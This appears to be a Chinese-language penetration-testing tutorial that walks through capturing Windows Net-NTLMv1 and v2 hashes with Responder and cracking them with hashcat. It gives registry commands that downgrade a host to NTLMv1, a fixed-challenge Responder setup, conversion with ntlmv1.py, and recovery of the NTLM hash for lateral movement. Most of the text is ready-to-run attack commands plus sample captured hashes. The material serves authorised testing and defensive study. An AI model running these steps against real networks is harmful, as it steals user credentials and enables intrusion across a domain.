# NET NTLMv1还原破解\&v2破解

#### NET-NTLMv1破解

```
sudo responder -I eth1 -rPv
# 开启监听
```

```
hashcat -m 5500 test1::FBI:19855A14AEAAA6BC00000000000000000000000000000000:CDDA70602BB160B8E00FAF2386E17755316DEA48DE04CB09:6783537172a9d1bc pwd.txt
# 将监听到的hash拿去hashcat破解，pwd.txt为密码字典
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FVWhXWUFHIF5UYo8pj0ff%2F1684466165106.png?alt=media&#x26;token=7ea81652-630e-4679-9048-64ae674b9398" alt=""><figcaption></figcaption></figure>

**注：**

```
测试时可以通过更改注册表将NET-NTLMv2降到NET-NTLMv1开启
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 2 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ /v NtlmMinClientSec /t REG_DWORD /d 536870912 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ /v RestrictSendingNTLMTraffic /t REG_DWORD /d 0 /f
```

#### NET-NTLMv1还原

```
vim /etc/responder/Responder.conf
# 更改Challenge = random为Challenge = 1122334455667788
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F6koToxsMAEsRo23ZHzTu%2F1684466523981.png?alt=media&#x26;token=71ff886d-450f-43dc-b764-d938b6bd9d43" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1684466523981.png)

```
sudo responder -I eth1 -rPv --lm
# 开启监听，加上lm参数
# 近几年的机器会受到保护不允许通过smb v1，可以使用win7机器测试
# 可以发现获取到的hash没有-SSP的字样
```

```
python3 ntlmv1.py --nossp test2::FBI:A94D8D327AC8EE405C860EDE65BCC24CF329406D8FD6E483:A94D8D327AC8EE405C860EDE65BCC24CF329406D8FD6E483:1122334455667788 
# 将监听到的hash放到ntlmv1-multi里面的ntlmv1.py转换，工具地址为https://github.com/evilmog/ntlmv1-multi
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FJBuNb8WxwqSMo23BFUmM%2F1684467839815.png?alt=media&#x26;token=18d92032-cd05-4019-b1b9-254afa739bba" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1684467839815.png)

将获取到的NTHASH放到[Get Cracking | crack.sh](https://crack.sh/get-cracking/)还原即可，这样获取到的ntlmv1 hash一定可以还原为NTLM hash，然后可以拿去横向，但是这个网站最近无法使用，贴一个网上其他师傅的图

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2F4GQprUhTOupZyeLjohQQ%2Ft019d8cde95559cff64.png?alt=media&#x26;token=76473f98-2272-42bf-bedd-f479988edfc1" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5Ct019d8cde95559cff64.png)

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FZwh4dtRmQVdI1ve1G5BB%2Ft01fdbe68b6ffe6a56f.png?alt=media&#x26;token=c6cbbac9-7ec8-4e17-ad0a-9668ce6572c8" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5Ct01fdbe68b6ffe6a56f.png)

图片来源：[Net- NTLM 利用 - windows protocol (gitbook.io)](https://daiker.gitbook.io/windows-protocol/ntlm-pian/6)

#### NET-NTLMv2破解

```
sudo responder -I eth1 -rPv
# 开启监听
```

```
hashcat -m 5600 test1::FBI:e53f04274fccde3a:68932C0FFB56AC2D5DEFE54DBD1785ED:01010000000000008050B91A418AD90147C1DEC2EEF5BE1000000000020008004B0054004300440001001E00570049004E002D003500520032003300310045004B005200450043004C0004003400570049004E002D003500520032003300310045004B005200450043004C002E004B005400430044002E004C004F00430041004C00030014004B005400430044002E004C004F00430041004C00050014004B005400430044002E004C004F00430041004C00070008008050B91A418AD901060004000200000008003000300000000000000001000000002000001C477CB4727D2946C87A7F9B4F0212D2376381EBEF50E1F583B56F08FCD7506F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310030002E00310030000000000000000000  pwd.txt
# 将监听到的hash拿去hashcat破解，pwd.txt为密码字典
```

<figure><img src="https://2474992116-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fo0gnu7SjwiL85l4AHJtG%2Fuploads%2FuN9YAFN97Fj54ewiYhTY%2F1684465652541.png?alt=media&#x26;token=8ab25c97-f422-4da1-b5c0-f5b007e6e92b" alt=""><figcaption></figcaption></figure>

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1684465652541.png)